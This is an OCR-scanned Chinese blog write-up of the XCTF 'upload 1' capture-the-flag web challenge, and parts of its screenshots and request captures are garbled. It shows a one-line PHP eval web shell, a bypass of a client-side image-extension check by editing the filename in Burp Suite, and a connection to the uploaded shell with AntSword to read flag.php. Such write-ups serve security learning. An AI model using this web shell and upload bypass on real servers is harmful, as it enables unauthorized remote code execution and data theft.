# XCTF-Web|upload 1详细WriteUp

| 原创                                                                                                    |                                       |
|----------------------------------------------------------------------------------------------------|---------------------------------------|
| <u>不要秃头、</u> 于 2020-09-12 18:20:28 发布<br>↑<br>分类专栏: <u>ctf学习</u> 文章标签: <u>php 信息安全</u><br>版权声明:本文为博主原创文章,遵循 <u>CC 4.0 BY-S/</u><br>本立链接: <u>bttps://blog.ccdp.pct/weivip</u> 42240821/orti | 53 论 收藏<br>_版权协议,转载请附上原文出处链接和本声明。     |
| 本文確接: <u>Intps://biog.csdif.inet/weixir_43340621/ait</u> 版权<br><u> </u>                                                                                                    | <u>Je/Uetans/100552343</u>            |
| 3 篇文章 0 订阅<br>订阅专栏<br>获取在线场景,得到:                                                                                                    |                                       |
| $\leftrightarrow$ > C' $\textcircled{0}$                                                                                                    | 220.249.52.133:52210                  |
| 📄 火狐官方站点 🛭 😓 新手上路 📄 常用                                                                                                    | 网址 💮 京东商城                             |
| 浏览 未选择文件。                                                                                                    | 上传                                    |
|                                                                                                    |                                       |
| 联想可能是要上传webshell。于是编写一句话木马脚之                                                                                                    | ž:                                    |
| php @eval(\$_POST['flag']);?                                                                                                    |                                       |
| 当直接上传.php文件时,显示:                                                                                                    |                                       |
| <b>浏览…</b> 1.php 上传                                                                                                    |                                       |
|                                                                                                    | 请选择一张图片文件上传!                          |
|                                                                                                    | 确定 确定                                 |
|                                                                                                    | https://blog.csdn.net/weixin_43340821 |

可知需要修改文件后缀,成为图片格式 将一句话木马的文件后缀改为.png或.jpg 选择文件,开启burpsuite拦截器,上传文件:

## Burp Suite Professional v1.7.37 - Temporary Project - 1

| Burp    | Intruder F    | Repeater     | Window    | Help         |               |              |             |              |          |           |
|---------|---------------|--------------|-----------|--------------|---------------|--------------|-------------|--------------|----------|-----------|
| Targ    | get Proxy     | Spider       | Scanne    | r Intruder   | Repeater      | Sequencer    | Decoder     | Comparer     | Extender | Project c |
| Inter   | cept HT       | TP history   | WebSo     | ockets histo | ry Options    | •            |             |              |          |           |
| F       | Request to    | http://220   | .249.52.1 | 133:52210    |               |              |             |              |          |           |
| F       | orward        |              | Drop      | Intercep     | ot is on      | Action       |             |              |          |           |
| Raw     | Params        | Headers      | s Hex     |              |               |              |             |              |          |           |
| POST    | /index.ph     | p HTTP/1     | .1        |              |               |              |             |              |          |           |
| Host: : | 220.249.5     | 2.133:522    | 10        |              |               |              |             |              |          |           |
| User-A  | Agent: Moz    | zilla/5.0 (W | Vindows N | VT 10.0; Wi  | in64; x64; rv | :80.0) Gecko | /20100101   | Firefox/80.0 | )        |           |
| Accep   | t: text/html  | ,applicatio  | n/xhtml+  | xml,applicat | tion/xml;q=0  | .9,image/web | 3.0=p;*/*;q | 3            |          |           |
| Accep   | t-Languag     | e: zh-CN,    | zh;q=0.8, | zh-TW;q=0    | .7,zh-HK;q=   | 0.5,en-US;q= | =0.3,en;q=0 | 0.2          |          |           |
| Accep   | t-Encoding    | g:gzip,de    | flate     |              |               |              |             |              |          |           |
| Conte   | nt-Type: m    | nultipart/fo | rm-data;  | boundary=-   |               | 4132         | 232760616   | 3687896036   | 12687714 |           |
| Conte   | nt-Length:    | 248          |           |              |               |              |             |              |          |           |
| Origin  | : http://220  | .249.52.1    | 33:52210  | )            |               |              |             |              |          |           |
| Conne   | ction: clos   | e            |           |              |               |              |             |              |          |           |
| Refere  | er: http://22 | 20.249.52    | .133:522  | 10/          |               |              |             |              |          |           |
| Upgra   | de-Insecu     | re-Reques    | sts: 1    |              |               |              |             |              |          |           |
|         |               | 4132         | 23276061  | 1636878960   | 0361268771    | 4            |             |              |          |           |
| Conte   | nt-Disposi    | tion: form-  | data; nan | ne="upfile"; | filename="    | 1.png"       |             |              |          |           |
| Conto   | nt Turna in   | nogo/nng     |           |              |               |              |             |              |          |           |

Content-Type: image/png

### <?php @eval(\$\_POST['flag']);?>

-----413232760616368789603612687714--

https://blog.csdn.net/weixin\_43340821

在filename处修改文件后缀名为.php,全选数据包后右键,点击send to repeater。在repeater页面点击Go按钮:

| 🚯 Burp Suite Professional v1.7.37 - Temporary Project - 1                 |                                                                      | - 0 >                               |
|---------------------------------------------------------------------------|----------------------------------------------------------------------|-------------------------------------|
| Burp Intruder Repeater Window Help                                        |                                                                      |                                     |
| Target Proxy Spider Scanner Intruder Repeater Sequencer Deco              | der Comparer Extender Project options User options Alerts            |                                     |
| $1 \times 2 \times 3 \times 4 \times 5 \times$                            |                                                                      |                                     |
| Go Cancel <   v >   v                                                     |                                                                      | Target: http://220.249.52.133:52210 |
| Request                                                                   | Response                                                             |                                     |
| Raw Params Headers Hex                                                    | Raw Headers Hex                                                      |                                     |
| POST /index.php HTTP/1.1                                                  | HTTP/1.1 200 OK                                                      |                                     |
| Host: 220.249.52.133:52210                                                | Date: Sat, 12 Sep 2020 10:13:07 GMT                                  |                                     |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)            | Server: Apache/2.4.25 (Debian)                                       |                                     |
| Gecko/20100101 Firefox/80.0                                               | X-Powered-By: PHP/5.6.37                                             |                                     |
| Accept:                                                                   | Vary: Accept-Encoding                                                |                                     |
| text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. | Content-Length: 956                                                  |                                     |
| 8                                                                         | Connection: close                                                    |                                     |
| Accept-Language:                                                          | Content-Type: text/html; charset=UTF-8                               |                                     |
| zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2               |                                                                      |                                     |
| Accept-Encoding: gzip, deflate                                            |                                                                      |                                     |
| Content-Type: multipart/form-data;                                        | upload success : upload/1599905587.1.php                             |                                     |
| boundary=413232760616368789603612687714                                   | html                                                                 |                                     |
| Content-Length: 248                                                       | <html></html>                                                        |                                     |
| Origin: http://220.249.52.133:52210                                       | <head></head>                                                        |                                     |
| Connection: close                                                         | <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/> |                                     |
| Referer: http://220.249.52.133:52210/                                     |                                                                      |                                     |
| Upgrade-Insecure-Requests: 1                                              | <script type="text/javascript"></script>                             |                                     |

如图荧光笔位置显示出一句话木马成功上传的位置

此时用中国蚁剑进行连接:注意url地址一定是php上传的位置!,连接密码是php中自定义的密码

| □ 添加数据        |                                                     |   | × |
|---------------|-----------------------------------------------------|---|---|
| □P地<br>●添加 ×  | 清空 🔅 测试连接                                           |   |   |
| ■ 基础配置        |                                                     |   | ~ |
| URL地址 *       | http://220.249.52.133:52210/upload/1599905587.1.php |   |   |
| 连接密码 *        | flag                                                |   |   |
| 网站备注          |                                                     |   |   |
| 编码设置          | UTF8                                                | ~ |   |
| 连接类型          | PHP                                                 | ~ |   |
|               | 编码器                                                 |   |   |
|               | ● default (不推荐)                                     |   |   |
|               | ○ random (不推荐)                                      |   |   |
|               | O base64                                            |   | • |
| <b>e</b> 请求信息 |                                                     |   | ~ |

#### 右键url点击文件管理,即可看到目录

| AntSword 编辑 窗口 调试                     |                                            |                     |          |      |
|---------------------------------------|--------------------------------------------|---------------------|----------|------|
| ↓ ■ 220.249.52.133 ⊗                  |                                            |                     |          |      |
| □ 目录列表 (1) <                          | 🗅 文件列表 <b>(5)</b>                          |                     |          |      |
|                                       | ●新建 → │ ↑上层 │ ♥刷新 │ 斧 主目录 │ ■书签 → │ /var/w | ww/html/            |          | → 读取 |
| e- var<br>e- www<br>e- html<br>upload | 名称                                         | 日期                  | 大小       | 属性   |
|                                       | 🗀 upload                                   | 2020-09-12 10:13:07 | 4 Kb     | 0755 |
|                                       | ති flag.php                                | 2020-09-12 08:07:09 | 63 b     | 0664 |
|                                       | 动 index.html                               | 2018-09-12 01:54:42 | 11.24 Kb | 0664 |
|                                       | 动 index.php                                | 2018-09-12 01:54:42 | 1.35 Kb  | 0664 |
|                                       | install.sh                                 | 2018-09-12 01:54:42 | 221 b    | 0775 |

https://blog.csdn.net/weixin\_43340821

#### 💯 中国蚁剑

| ntSwo                        | rd 编辑 窗口 调试                                                         |         |             |  |  |  |  |
|------------------------------|---------------------------------------------------------------------|---------|-------------|--|--|--|--|
|                              | □ 220.249.52.133 ⊗                                                  |         |             |  |  |  |  |
| _ 编辑: /var/www/html/flag.php |                                                                     |         |             |  |  |  |  |
| /va                          | ar/www/html/flag.php                                                |         | <b>2</b> 刷新 |  |  |  |  |
| 1<br>2<br>3<br>4             | <pre><?php \$flag="cyberpeace{9575ab47a40043e26f97c3f84464 ?></pre> | 0e55}"; |             |  |  |  |  |

得到最终的flag值:

cyberpeace{9575ab47a40043e26f97c3f844640e55}